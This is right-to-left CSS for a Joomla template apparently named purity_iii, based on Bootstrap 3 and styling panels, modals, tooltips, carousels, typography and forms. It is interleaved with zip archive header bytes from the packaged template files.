  border-top-color: #d6e9c6;
}
.panel-success > .panel-heading .badge {
  color: #dff0d8;
  background-color: #468847;
}
.panel-success > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #d6e9c6;
}
.panel-info {
  border-color: #bce8f1;
}
.panel-info > .panel-heading {
  color: #3a87ad;
  background-color: #d9edf7;
  border-color: #bce8f1;
}
.panel-info > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #bce8f1;
}
.panel-info > .panel-heading .badge {
  color: #d9edf7;
  background-color: #3a87ad;
}
.panel-info > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #bce8f1;
}
.panel-warning {
  border-color: #faebcc;
}
.panel-warning > .panel-heading {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #faebcc;
}
.panel-warning > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #faebcc;
}
.panel-warning > .panel-heading .badge {
  color: #fcf8e3;
  background-color: #c09853;
}
.panel-warning > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #faebcc;
}
.panel-danger {
  border-color: #ebccd1;
}
.panel-danger > .panel-heading {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #ebccd1;
}
.panel-danger > .panel-heading + .panel-collapse > .panel-body {
  border-top-color: #ebccd1;
}
.panel-danger > .panel-heading .badge {
  color: #f2dede;
  background-color: #b94a48;
}
.panel-danger > .panel-footer + .panel-collapse > .panel-body {
  border-bottom-color: #ebccd1;
}
.well {
  min-height: 20px;
  padding: 19px;
  margin-bottom: 20px;
  background-color: #f5f5f5;
  border: 1px solid #e3e3e3;
  border-radius: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.05);
}
.well blockquote {
  border-color: #ddd;
  border-color: rgba(0, 0, 0, 0.15);
}
.well-lg {
  padding: 24px;
  border-radius: 0;
}
.well-sm {
  padding: 9px;
  border-radius: 0;
}
.close {
  float: left;
  font-size: 21px;
  font-weight: bold;
  line-height: 1;
  color: #000000;
  text-shadow: 0 1px 0 #ffffff;
  filter: alpha(opacity=20);
  opacity: 0.2;
}
.close:hover,
.close:focus {
  color: #000000;
  text-decoration: none;
  cursor: pointer;
  filter: alpha(opacity=50);
  opacity: 0.5;
}
button.close {
  padding: 0;
  cursor: pointer;
  background: transparent;
  border: 0;
  -webkit-appearance: none;
  appearance: none;
}

.modal-open {
  overflow: hidden;
}
.modal {
  position: fixed;
  top: 0;
  left: 0;
  bottom: 0;
  right: 0;
  z-index: 1050;
  display: none;
  overflow: hidden;
  -webkit-overflow-scrolling: touch;
  outline: 0;
}
.modal.fade .modal-dialog {
  -webkit-transform: translate(0, -25%);
  -ms-transform: translate(0, -25%);
  -o-transform: translate(0, -25%);
  transform: translate(0, -25%);
  -webkit-transition: -webkit-transform 0.3s ease-out;
  -moz-transition: -moz-transform 0.3s ease-out;
  -o-transition: -o-transform 0.3s ease-out;
  transition: transform 0.3s ease-out;
}
.modal.in .modal-dialog {
  -webkit-transform: translate(0, 0);
  -ms-transform: translate(0, 0);
  -o-transform: translate(0, 0);
  transform: translate(0, 0);
}
.modal-open .modal {
  overflow-x: hidden;
  overflow-y: auto;
}
.modal-dialog {
  position: relative;
  width: auto;
  margin: 10px;
}
.modal-content {
  position: relative;
  background-color: #ffffff;
  background-clip: padding-box;
  border: 1px solid #999999;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0;
  -webkit-box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  box-shadow: 0 3px 9px rgba(0, 0, 0, 0.5);
  outline: 0;
}
.modal-backdrop {
  position: fixed;
  top: 0;
  left: 0;
  bottom: 0;
  right: 0;
  z-index: 1040;
  background-color: #000000;
}
.modal-backdrop.fade {
  filter: alpha(opacity=0);
  opacity: 0;
}
.modal-backdrop.in {
  filter: alpha(opacity=50);
  opacity: 0.5;
}
.modal-header {
  padding: 20px;
  border-bottom: 1px solid #e5e5e5;
}
.modal-header .close {
  margin-top: -2px;
}
.modal-title {
  margin: 0;
  line-height: 1.42857143;
}
.modal-body {
  position: relative;
  padding: 20px;
}
.modal-footer {
  padding: 20px;
  text-align: left;
  border-top: 1px solid #e5e5e5;
}
.modal-footer .btn + .btn {
  margin-bottom: 0;
  margin-right: 5px;
}
.modal-footer .btn-group .btn + .btn {
  margin-right: -1px;
}
.modal-footer .btn-block + .btn-block {
  margin-right: 0;
}
.modal-scrollbar-measure {
  position: absolute;
  top: -9999px;
  width: 50px;
  height: 50px;
  overflow: scroll;
}
@media (min-width: 768px) {
  .modal-dialog {
    width: 600px;
    margin: 30px auto;
  }
  .modal-content {
    -webkit-box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
    box-shadow: 0 5px 15px rgba(0, 0, 0, 0.5);
  }
  .modal-sm {
    width: 300px;
  }
}
@media (min-width: 992px) {
  .modal-lg {
    width: 900px;
  }
}
.tooltip {
  position: absolute;
  z-index: 1030;
  display: block;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-style: normal;
  font-weight: 400;
  line-height: 1.42857143;
  line-break: auto;
  text-align: right;
  text-align: start;
  text-decoration: none;
  text-shadow: none;
  text-transform: none;
  letter-spacing: normal;
  word-break: normal;
  word-spacing: normal;
  word-wrap: normal;
  white-space: normal;
  font-size: 12px;
  filter: alpha(opacity=0);
  opacity: 0;
}
.tooltip.in {
  filter: alpha(opacity=90);
  opacity: 0.9;
}
.tooltip.top {
  padding: 5px 0;
  margin-top: -3px;
}
.tooltip.right {
  padding: 0 5px;
  margin-right: 3px;
}
.tooltip.bottom {
  padding: 5px 0;
  margin-top: 3px;
}
.tooltip.left {
  padding: 0 5px;
  margin-right: -3px;
}
.tooltip.top .tooltip-arrow {
  bottom: 0;
  right: 50%;
  margin-right: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-left .tooltip-arrow {
  left: 5px;
  bottom: 0;
  margin-bottom: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.top-right .tooltip-arrow {
  bottom: 0;
  right: 5px;
  margin-bottom: -5px;
  border-width: 5px 5px 0;
  border-top-color: #000000;
}
.tooltip.right .tooltip-arrow {
  top: 50%;
  right: 0;
  margin-top: -5px;
  border-width: 5px 0 5px 5px;
  border-left-color: #000000;
}
.tooltip.left .tooltip-arrow {
  top: 50%;
  left: 0;
  margin-top: -5px;
  border-width: 5px 5px 5px 0;
  border-right-color: #000000;
}
.tooltip.bottom .tooltip-arrow {
  top: 0;
  right: 50%;
  margin-right: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-left .tooltip-arrow {
  top: 0;
  left: 5px;
  margin-top: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip.bottom-right .tooltip-arrow {
  top: 0;
  right: 5px;
  margin-top: -5px;
  border-width: 0 5px 5px;
  border-bottom-color: #000000;
}
.tooltip-inner {
  max-width: 350px;
  padding: 3px 8px;
  color: #ffffff;
  text-align: center;
  background-color: #000000;
  border-radius: 0;
}
.tooltip-arrow {
  position: absolute;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.popover {
  position: absolute;
  top: 0;
  right: 0;
  z-index: 1010;
  display: none;
  max-width: 276px;
  padding: 1px;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-style: normal;
  font-weight: 400;
  line-height: 1.42857143;
  line-break: auto;
  text-align: right;
  text-align: start;
  text-decoration: none;
  text-shadow: none;
  text-transform: none;
  letter-spacing: normal;
  word-break: normal;
  word-spacing: normal;
  word-wrap: normal;
  white-space: normal;
  font-size: 14px;
  background-color: #ffffff;
  background-clip: padding-box;
  border: 1px solid #cccccc;
  border: 1px solid rgba(0, 0, 0, 0.2);
  border-radius: 0;
  -webkit-box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
  box-shadow: 0 5px 10px rgba(0, 0, 0, 0.2);
}
.popover.top {
  margin-top: -10px;
}
.popover.right {
  margin-right: 10px;
}
.popover.bottom {
  margin-top: 10px;
}
.popover.left {
  margin-right: -10px;
}
.popover > .arrow {
  border-width: 11px;
}
.popover > .arrow,
.popover > .arrow:after {
  position: absolute;
  display: block;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
}
.popover > .arrow:after {
  content: "";
  border-width: 10px;
}
.popover.top > .arrow {
  bottom: -11px;
  right: 50%;
  margin-right: -11px;
  border-top-color: #999999;
  border-top-color: rgba(0, 0, 0, 0.25);
  border-bottom-width: 0;
}
.popover.top > .arrow:after {
  bottom: 1px;
  margin-right: -10px;
  content: " ";
  border-top-color: #ffffff;
  border-bottom-width: 0;
}
.popover.right > .arrow {
  top: 50%;
  right: -11px;
  margin-top: -11px;
  border-left-color: #999999;
  border-left-color: rgba(0, 0, 0, 0.25);
  border-right-width: 0;
}
.popover.right > .arrow:after {
  bottom: -10px;
  right: 1px;
  content: " ";
  border-left-color: #ffffff;
  border-right-width: 0;
}
.popover.bottom > .arrow {
  top: -11px;
  right: 50%;
  margin-right: -11px;
  border-top-width: 0;
  border-bottom-color: #999999;
  border-bottom-color: rgba(0, 0, 0, 0.25);
}
.popover.bottom > .arrow:after {
  top: 1px;
  margin-right: -10px;
  content: " ";
  border-top-width: 0;
  border-bottom-color: #ffffff;
}
.popover.left > .arrow {
  top: 50%;
  left: -11px;
  margin-top: -11px;
  border-left-width: 0;
  border-right-color: #999999;
  border-right-color: rgba(0, 0, 0, 0.25);
}
.popover.left > .arrow:after {
  left: 1px;
  bottom: -10px;
  content: " ";
  border-left-width: 0;
  border-right-color: #ffffff;
}
.popover-title {
  padding: 8px 14px;
  margin: 0;
  font-size: 14px;
  background-color: #f7f7f7;
  border-bottom: 1px solid #ebebeb;
  border-radius: -1 -1 0 0;
}
.popover-content {
  padding: 9px 14px;
}
.carousel {
  position: relative;
}
.carousel-inner {
  position: relative;
  width: 100%;
  overflow: hidden;
}
.carousel-inner > .item {
  position: relative;
  display: none;
  -webkit-transition: 0.6s ease-in-out right;
  -o-transition: 0.6s ease-in-out right;
  transition: 0.6s ease-in-out right;
}
.carousel-inner > .item > img,
.carousel-inner > .item > a > img {
  line-height: 1;
}
@media all and (transform-3d), (-webkit-transform-3d) {
  .carousel-inner > .item {
    -webkit-transition: -webkit-transform 0.6s ease-in-out;
    -moz-transition: -moz-transform 0.6s ease-in-out;
    -o-transition: -o-transform 0.6s ease-in-out;
    transition: transform 0.6s ease-in-out;
    -webkit-backface-visibility: hidden;
    -moz-backface-visibility: hidden;
    backface-visibility: hidden;
    -webkit-perspective: 1000px;
    -moz-perspective: 1000px;
    perspective: 1000px;
  }
  .carousel-inner > .item.next,
  .carousel-inner > .item.active.right {
    -webkit-transform: translate3d(100%, 0, 0);
    transform: translate3d(100%, 0, 0);
    right: 0;
  }
  .carousel-inner > .item.prev,
  .carousel-inner > .item.active.left {
    -webkit-transform: translate3d(-100%, 0, 0);
    transform: translate3d(-100%, 0, 0);
    right: 0;
  }
  .carousel-inner > .item.next.left,
  .carousel-inner > .item.prev.right,
  .carousel-inner > .item.active {
    -webkit-transform: translate3d(0, 0, 0);
    transform: translate3d(0, 0, 0);
    right: 0;
  }
}
.carousel-inner > .active,
.carousel-inner > .next,
.carousel-inner > .prev {
  display: block;
}
.carousel-inner > .active {
  right: 0;
}
.carousel-inner > .next,
.carousel-inner > .prev {
  position: absolute;
  top: 0;
  width: 100%;
}
.carousel-inner > .next {
  right: 100%;
}
.carousel-inner > .prev {
  right: -100%;
}
.carousel-inner > .next.left,
.carousel-inner > .prev.right {
  right: 0;
}
.carousel-inner > .active.left {
  right: -100%;
}
.carousel-inner > .active.right {
  right: 100%;
}
.carousel-control {
  position: absolute;
  top: 0;
  bottom: 0;
  right: 0;
  width: 15%;
  font-size: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
  background-color: rgba(0, 0, 0, 0);
  filter: alpha(opacity=50);
  opacity: 0.5;
}
.carousel-control.left {
  background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-image: -o-linear-gradient(left, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.5) 0%, rgba(0, 0, 0, 0.0001) 100%);
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#80000000', endColorstr='#00000000', GradientType=1);
  background-repeat: repeat-x;
}
.carousel-control.right {
  left: 0;
  right: auto;
  background-image: -webkit-linear-gradient(left, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-image: -o-linear-gradient(left, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  background-image: linear-gradient(to right, rgba(0, 0, 0, 0.0001) 0%, rgba(0, 0, 0, 0.5) 100%);
  filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#00000000', endColorstr='#80000000', GradientType=1);
  background-repeat: repeat-x;
}
.carousel-control:hover,
.carousel-control:focus {
  color: #ffffff;
  text-decoration: none;
  outline: 0;
  filter: alpha(opacity=90);
  opacity: 0.9;
}
.carousel-control .icon-prev,
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-left,
.carousel-control .glyphicon-chevron-right {
  position: absolute;
  top: 50%;
  z-index: 5;
  display: inline-block;
  margin-top: -10px;
}
.carousel-control .icon-prev,
.carousel-control .glyphicon-chevron-left {
  right: 50%;
  margin-right: -10px;
}
.carousel-control .icon-next,
.carousel-control .glyphicon-chevron-right {
  left: 50%;
  margin-left: -10px;
}
.carousel-control .icon-prev,
.carousel-control .icon-next {
  width: 20px;
  height: 20px;
  font-family: serif;
  line-height: 1;
}
.carousel-control .icon-prev:before {
  content: "\2039";
}
.carousel-control .icon-next:before {
  content: "\203a";
}
.carousel-indicators {
  position: absolute;
  bottom: 10px;
  right: 50%;
  z-index: 15;
  width: 60%;
  padding-right: 0;
  margin-right: -30%;
  text-align: center;
  list-style: none;
}
.carousel-indicators li {
  display: inline-block;
  width: 10px;
  height: 10px;
  margin: 1px;
  text-indent: -999px;
  cursor: pointer;
  background-color: #000 \9;
  background-color: rgba(0, 0, 0, 0);
  border: 1px solid #ffffff;
  border-radius: 10px;
}
.carousel-indicators .active {
  width: 12px;
  height: 12px;
  margin: 0;
  background-color: #ffffff;
}
.carousel-caption {
  position: absolute;
  left: 15%;
  bottom: 20px;
  right: 15%;
  z-index: 10;
  padding-top: 20px;
  padding-bottom: 20px;
  color: #ffffff;
  text-align: center;
  text-shadow: 0 1px 2px rgba(0, 0, 0, 0.6);
}
.carousel-caption .btn {
  text-shadow: none;
}
@media screen and (min-width: 768px) {
  .carousel-control .glyphicon-chevron-left,
  .carousel-control .glyphicon-chevron-right,
  .carousel-control .icon-prev,
  .carousel-control .icon-next {
    width: 30px;
    height: 30px;
    margin-top: -10px;
    font-size: 30px;
  }
  .carousel-control .glyphicon-chevron-left,
  .carousel-control .icon-prev {
    margin-right: -10px;
  }
  .carousel-control .glyphicon-chevron-right,
  .carousel-control .icon-next {
    margin-left: -10px;
  }
  .carousel-caption {
    left: 20%;
    right: 20%;
    padding-bottom: 30px;
  }
  .carousel-indicators {
    bottom: 20px;
  }
}

.clearfix:before,
.clearfix:after,
.container:before,
.container:after,
.container-fluid:before,
.container-fluid:after,
.row:before,
.row:after,
.form-horizontal .form-group:before,
.form-horizontal .form-group:after,
.btn-toolbar:before,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:before,
.btn-group-vertical > .btn-group:after,
.nav:before,
.nav:after,
.navbar:before,
.navbar:after,
.navbar-header:before,
.navbar-header:after,
.navbar-collapse:before,
.navbar-collapse:after,
.pager:before,
.pager:after,
.panel-body:before,
.panel-body:after,
.modal-header:before,
.modal-header:after,
.modal-footer:before,
.modal-footer:after {
  display: table;
  content: " ";
}
.clearfix:after,
.container:after,
.container-fluid:after,
.row:after,
.form-horizontal .form-group:after,
.btn-toolbar:after,
.btn-group-vertical > .btn-group:after,
.nav:after,
.navbar:after,
.navbar-header:after,
.navbar-collapse:after,
.pager:after,
.panel-body:after,
.modal-header:after,
.modal-footer:after {
  clear: both;
}
.center-block {
  display: block;
  margin-left: auto;
  margin-right: auto;
}
.pull-right {
  float: left !important;
}
.pull-left {
  float: right !important;
}
.hide {
  display: none !important;
}
.show {
  display: block !important;
}
.invisible {
  visibility: hidden;
}
.text-hide {
  font: 0/0 a;
  color: transparent;
  text-shadow: none;
  background-color: transparent;
  border: 0;
}
.hidden {
  display: none !important;
}
.affix {
  position: fixed;
}
@-ms-viewport {
  width: device-width;
}
.visible-xs,
.visible-sm,
.visible-md,
.visible-lg {
  display: none !important;
}
.visible-xs-block,
.visible-xs-inline,
.visible-xs-inline-block,
.visible-sm-block,
.visible-sm-inline,
.visible-sm-inline-block,
.visible-md-block,
.visible-md-inline,
.visible-md-inline-block,
.visible-lg-block,
.visible-lg-inline,
.visible-lg-inline-block {
  display: none !important;
}
@media (max-width: 767px) {
  .visible-xs {
    display: block !important;
  }
  table.visible-xs {
    display: table !important;
  }
  tr.visible-xs {
    display: table-row !important;
  }
  th.visible-xs,
  td.visible-xs {
    display: table-cell !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-block {
    display: block !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-inline {
    display: inline !important;
  }
}
@media (max-width: 767px) {
  .visible-xs-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm {
    display: block !important;
  }
  table.visible-sm {
    display: table !important;
  }
  tr.visible-sm {
    display: table-row !important;
  }
  th.visible-sm,
  td.visible-sm {
    display: table-cell !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-block {
    display: block !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-inline {
    display: inline !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .visible-sm-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md {
    display: block !important;
  }
  table.visible-md {
    display: table !important;
  }
  tr.visible-md {
    display: table-row !important;
  }
  th.visible-md,
  td.visible-md {
    display: table-cell !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-block {
    display: block !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-inline {
    display: inline !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .visible-md-inline-block {
    display: inline-block !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg {
    display: block !important;
  }
  table.visible-lg {
    display: table !important;
  }
  tr.visible-lg {
    display: table-row !important;
  }
  th.visible-lg,
  td.visible-lg {
    display: table-cell !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-block {
    display: block !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-inline {
    display: inline !important;
  }
}
@media (min-width: 1200px) {
  .visible-lg-inline-block {
    display: inline-block !important;
  }
}
@media (max-width: 767px) {
  .hidden-xs {
    display: none !important;
  }
}
@media (min-width: 768px) and (max-width: 991px) {
  .hidden-sm {
    display: none !important;
  }
}
@media (min-width: 992px) and (max-width: 1199px) {
  .hidden-md {
    display: none !important;
  }
}
@media (min-width: 1200px) {
  .hidden-lg {
    display: none !important;
  }
}
.visible-print {
  display: none !important;
}
@media print {
  .visible-print {
    display: block !important;
  }
  table.visible-print {
    display: table !important;
  }
  tr.visible-print {
    display: table-row !important;
  }
  th.visible-print,
  td.visible-print {
    display: table-cell !important;
  }
}
.visible-print-block {
  display: none !important;
}
@media print {
  .visible-print-block {
    display: block !important;
  }
}
.visible-print-inline {
  display: none !important;
}
@media print {
  .visible-print-inline {
    display: inline !important;
  }
}
.visible-print-inline-block {
  display: none !important;
}
@media print {
  .visible-print-inline-block {
    display: inline-block !important;
  }
}
@media print {
  .hidden-print {
    display: none !important;
  }
}PKӜ�\���VV(purity_iii/css/rtl/legacy-navigation.cssnu&1i�.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  right: 100%;
  margin-top: -5px;
  margin-right: -1px;
}
.dropdown-submenu.open > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 0;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: left;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 5px 5px 0;
  border-right-color: #111111;
  margin-top: 5px;
  margin-left: -5px;
}
.dropdown-submenu.open > a:after {
  border-right-color: #ffffff;
}PKӜ�\)^�ZZpurity_iii/css/rtl/template.cssnu&1i�@media (max-width: 990px) {
  .always-show .mega > .mega-dropdown-menu,
  .always-show .dropdown-menu {
    display: block !important;
    position: static;
  }
  .open .dropdown-menu {
    display: block;
  }
}
.t3-logo,
.t3-logo-small {
  display: block;
  text-decoration: none;
  text-align: right;
  background-repeat: no-repeat;
  background-position: center;
}
.t3-logo {
  width: 182px;
  height: 50px;
}
.t3-logo-small {
  width: 60px;
  height: 30px;
}
.t3-logo,
.t3-logo-color {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-color.png");
}
.t3-logo-small,
.t3-logo-small.t3-logo-color {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-color.png");
}
.t3-logo-dark {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-dark.png");
}
.t3-logo-small.t3-logo-dark {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-dark.png");
}
.t3-logo-light {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-big-light.png");
}
.t3-logo-small.t3-logo-light {
  background-image: url("//static.joomlart.com/images/jat3v3-documents/logo-complete/t3logo-small-light.png");
}
@media (max-width: 990px) {
  .logo-control .logo-img-sm {
    display: block;
  }
  .logo-control .logo-img {
    display: none;
  }
}
@media (min-width: 991px) {
  .logo-control .logo-img-sm {
    display: none;
  }
  .logo-control .logo-img {
    display: block;
  }
}
#community-wrap .collapse {
  position: relative;
  height: 0;
  overflow: hidden;
  display: block;
}
.body-data-holder:before {
  display: none;
  content: "grid-float-breakpoint:991px screen-xs:480px screen-sm:768px screen-md:992px screen-lg:1200px";
}

body {
  padding-top: 55px;
}
input,
button,
select,
textarea {
  font-family: inherit;
  font-size: inherit;
  line-height: inherit;
}
a {
  color: #0077bb;
  text-decoration: none;
  outline: none;
  -webkit-transition: all 0.2s;
  -o-transition: all 0.2s;
  transition: all 0.2s;
}
a:hover,
a:focus {
  color: #00466e;
  text-decoration: underline;
}
a:focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
img {
  vertical-align: middle;
}
th,
td {
  line-height: 1.42857143;
  text-align: right;
  vertical-align: top;
}
th {
  font-weight: bold;
}
td,
tr td {
  border-top: 1px solid #dddddd;
}
.cat-list-row0:hover,
.cat-list-row1:hover {
  background: #f5f5f5;
}
.cat-list-row1,
tr.cat-list-row1 td {
  background: #f9f9f9;
}
table.contentpane,
table.tablelist,
table.category,
table.admintable,
table.blog {
  width: 100%;
}
table.contentpaneopen {
  border: 0;
}
.star {
  color: #ffcc00;
}
.red {
  color: #cc0000;
}
hr {
  margin-top: 20px;
  margin-bottom: 20px;
  border: 0;
  border-top: 1px solid #eeeeee;
}
.wrap {
  width: auto;
  clear: both;
}
.center,
.table td.center,
.table th.center {
  text-align: center;
}
.element-invisible {
  position: absolute;
  padding: 0;
  margin: 0;
  border: 0;
  height: 1px;
  width: 1px;
  overflow: hidden;
}

p {
  margin: 0 0 10px;
}
.lead {
  margin-bottom: 20px;
  font-size: 16px;
  font-weight: 200;
  line-height: 1.4;
}
@media (min-width: 992px) {
  .lead {
    font-size: 18px;
  }
}
small,
.small {
  font-size: 85%;
}
cite {
  font-style: normal;
}
.text-muted {
  color: #999999;
}
.text-primary {
  color: #0077bb;
}
.text-warning {
  color: #c09853;
}
.text-danger {
  color: #b94a48;
}
.text-success {
  color: #468847;
}
.text-info {
  color: #3a87ad;
}
.text-left {
  text-align: right;
}
.text-right {
  text-align: left;
}
.text-center {
  text-align: center;
}
.text-justify {
  text-align: justify;
}
.text-center .item-image img {
  margin: 0 auto;
}
.inline {
  display: inline-block;
}
.inline + .inline {
  margin-right: 20px;
}
.highlight {
  background-color: #FFC;
  font-weight: bold;
  padding: 1px 4px;
}
h1,
h2,
h3,
h4,
h5,
h6,
.h1,
.h2,
.h3,
.h4,
.h5,
.h6 {
  color: inherit;
  font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;
  font-weight: 500;
  line-height: 1.1;
}
h1 small,
h2 small,
h3 small,
h4 small,
h5 small,
h6 small,
.h1 small,
.h2 small,
.h3 small,
.h4 small,
.h5 small,
.h6 small {
  font-weight: normal;
  line-height: 1;
  color: #999999;
}
h1,
h2,
h3 {
  margin-top: 20px;
  margin-bottom: 10px;
}
h4,
h5,
h6 {
  margin-top: 10px;
  margin-bottom: 10px;
}
h1,
.h1 {
  font-size: 42px;
}
h2,
.h2 {
  font-size: 35px;
}
h3,
.h3 {
  font-size: 24px;
}
h4,
.h4 {
  font-size: 18px;
}
h5,
.h5 {
  font-size: 14px;
}
h6,
.h6 {
  font-size: 12px;
}
h1 small,
.h1 small {
  font-size: 24px;
}
h2 small,
.h2 small {
  font-size: 18px;
}
h3 small,
.h3 small,
h4 small,
.h4 small {
  font-size: 14px;
}
ul,
ol {
  margin-top: 0;
  margin-bottom: 10px;
}
ul ul,
ol ul,
ul ol,
ol ol {
  margin-bottom: 0;
}
.list-unstyled {
  padding-right: 0;
  list-style: none;
}
.list-inline {
  padding-right: 0;
  list-style: none;
}
.list-inline > li {
  display: inline-block;
  padding-right: 5px;
  padding-left: 5px;
}
dl {
  margin-bottom: 20px;
}
dt,
dd {
  line-height: 1.42857143;
}
dt {
  font-weight: bold;
}
dd {
  margin-right: 0;
}
@media (min-width: 991px) {
  .dl-horizontal dt {
    float: right;
    width: 160px;
    clear: right;
    text-align: left;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
  }
  .dl-horizontal dd {
    margin-right: 180px;
  }
  .dl-horizontal dd:before,
  .dl-horizontal dd:after {
    display: table;
    content: " ";
  }
  .dl-horizontal dd:after {
    clear: both;
  }
}
abbr[title],
abbr[data-original-title] {
  cursor: help;
  border-bottom: 1px dotted #999999;
}
abbr.initialism {
  font-size: 90%;
  text-transform: uppercase;
}
blockquote {
  padding: 10px 20px;
  margin: 0 0 20px;
  border-right: 5px solid #eeeeee;
}
blockquote p {
  font-size: 17.5px;
  font-weight: 300;
  line-height: 1.5;
}
blockquote p:last-child {
  margin-bottom: 0;
}
blockquote small {
  display: block;
  line-height: 1.42857143;
  color: #999999;
}
blockquote small:before {
  content: '\2014 \00A0';
}
blockquote.pull-right {
  padding-left: 15px;
  padding-right: 0;
  border-left: 5px solid #eeeeee;
  border-right: 0;
}
blockquote.pull-right p,
blockquote.pull-right small {
  text-align: left;
}
blockquote.pull-right small:before {
  content: '';
}
blockquote.pull-right small:after {
  content: '\00A0 \2014';
}
q:before,
q:after,
blockquote:before,
blockquote:after {
  content: "";
}
address {
  display: block;
  margin-bottom: 20px;
  font-style: normal;
  line-height: 1.42857143;
}
code,
kbd,
pre,
samp {
  font-family: Consolas, Monaco, "Courier New", monospace;
}
.our-team {
  clear: both;
  overflow: hidden;
}

legend {
  padding-bottom: 10px;
  font-weight: 700;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999999;
}
.form-control::-webkit-input-placeholder {
  color: #999999;
}
textarea.form-control {
  height: auto;
}
.form-group {
  margin-bottom: 20px;
}
.radio label,
.checkbox label {
  display: inline;
}
.form-control-static {
  margin-bottom: 0;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
  }
  .form-inline .form-control {
    display: inline-block;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    float: none;
  }
}
.form-horizontal .control-label,
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  margin-top: 0;
  margin-bottom: 0;
  padding-top: 7px;
}
.form-horizontal .form-control-static {
  padding-top: 7px;
}
.btn-inverse {
  color: #ffffff;
  background-color: #444444;
  border-color: #373737;
}
.btn-inverse:focus,
.btn-inverse.focus {
  color: #ffffff;
  background-color: #2b2b2b;
  border-color: #000000;
}
.btn-inverse:hover {
  color: #ffffff;
  background-color: #2b2b2b;
  border-color: #191919;
}
.btn-inverse:active,
.btn-inverse.active,
.open > .dropdown-toggle.btn-inverse {
  color: #ffffff;
  background-color: #2b2b2b;
  background-image: none;
  border-color: #191919;
}
.btn-inverse:active:hover,
.btn-inverse.active:hover,
.open > .dropdown-toggle.btn-inverse:hover,
.btn-inverse:active:focus,
.btn-inverse.active:focus,
.open > .dropdown-toggle.btn-inverse:focus,
.btn-inverse:active.focus,
.btn-inverse.active.focus,
.open > .dropdown-toggle.btn-inverse.focus {
  color: #ffffff;
  background-color: #191919;
  border-color: #000000;
}
.btn-inverse.disabled:hover,
.btn-inverse[disabled]:hover,
fieldset[disabled] .btn-inverse:hover,
.btn-inverse.disabled:focus,
